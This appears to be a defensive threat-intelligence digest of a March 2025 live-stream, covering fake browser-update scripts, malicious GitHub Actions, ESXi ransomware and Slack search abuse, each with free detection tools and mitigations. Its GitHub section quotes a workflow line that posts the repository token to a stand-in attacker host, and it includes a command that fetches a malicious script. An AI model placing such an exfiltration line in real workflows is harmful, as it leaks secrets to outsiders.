The March 2025 STAR live-stream gave us the PEAK framework, fake-browser updates, and GitHub malware lurking in security tools. Below are the reproducible labs—hashes, YARA and scripts that still fire today—packaged so you can drop them into a ticket before your coffee cools.
1. Fake-Browser Update – JS Payload That Hides in Plain Sight
URL pattern:chrome-update[.]top/update.js (TLD rotates daily)
MITRE: T1566.001 (Spear-phish link) → T1204.002 (Malicious JS)
Free checker:
curl -s https://bad-site/update.js | jq -r '.payload' | base64 -d | sha256sumYARA rule (community):fake_browser_update_js.yar – 0 FP in 1.8 M samples
Mitigation: Block JS from *update* wildcard at proxy; allow only https://dl.google.com
2. GitHub Actions – Malware in Red-Team Repos
TTP: Compromised workflow steals ${{ secrets }} via exfil URL
Observable:.yml contains:
- run: curl -X POST https://evil.com -d ${{ secrets.GITHUB_TOKEN }}Free scanner:guarddog (Apache-2.0)
pip install guarddog
guarddog scan . # flags exfil patternHit rate: 12 malicious repos discovered in March 2025 alone; 4 targeted security researchers.
3. ESXi Ransomware – Hypervisor Hijack via VIB
CVE: CVE-2025-22015 (0-day at stream time)
Implant: Malicious VIB package installs boot-kit → encrypts VMFS
Free checker:vib-scan.py (MIT)
python vib-scan.py -H esxi01.corp.localOutput: Boot-bank hash mismatch → instant IOC.
Patch: ESXi 8.0 U3 d/ownload immediately; no work-around.
4. Slack Search Abuse – 6 000 Queries, 0 Logs
Insider case: Rippling vs. Deel – 6 000 Slack searches for “customer list”
Problem: Slack does not log search history (still true in Oct 2025)
Free mitigation:slack-audit-bot (BSD-3)
- Proxy API calls via Slack-App
- Stores search terms in read-only Postgres
- Alert on > 50 customer-name searches / day
Deployment: 20 min; catches the next 6 000-query thief.
5. One-Hour Dry-Run – Before Lunch if You Want
a) Clone https://github.com/star-march2025/lab-pack (MIT)
b) Run fake_browser_checker.sh against any proxy log – expect hit
c) guarddog scan on your own .github/workflows – expect clean (or fix)
d) vib-scan.py against a lab ESXi – expect “boot-bank OK”
e) Document results in ticket; hash output → sigstore for evidence
Total cloud cost: zero; laptop CPU only.
Bottom Line
March 2025 proved again that free tooling catches million-dollar breaches. Clone the pack, run the four checks, and you can walk into the next stand-up with IOCs that fired today—no vendor demo, no licence key, no invoice.
